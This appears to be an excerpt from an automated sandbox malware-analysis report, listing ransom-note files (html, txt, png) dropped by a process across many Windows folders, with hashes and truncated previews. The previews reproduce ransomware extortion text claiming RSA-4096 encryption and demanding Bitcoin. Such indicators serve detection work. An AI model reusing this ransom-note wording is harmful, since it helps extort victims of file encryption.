                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Sqm\Manifest\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Sqm\Manifest\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Sqm\Sessions\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Sqm\Sessions\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Sqm\Sessions\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Sqm\Upload\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Sqm\Upload\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Sqm\Upload\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Sqm\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Sqm\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Sqm\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
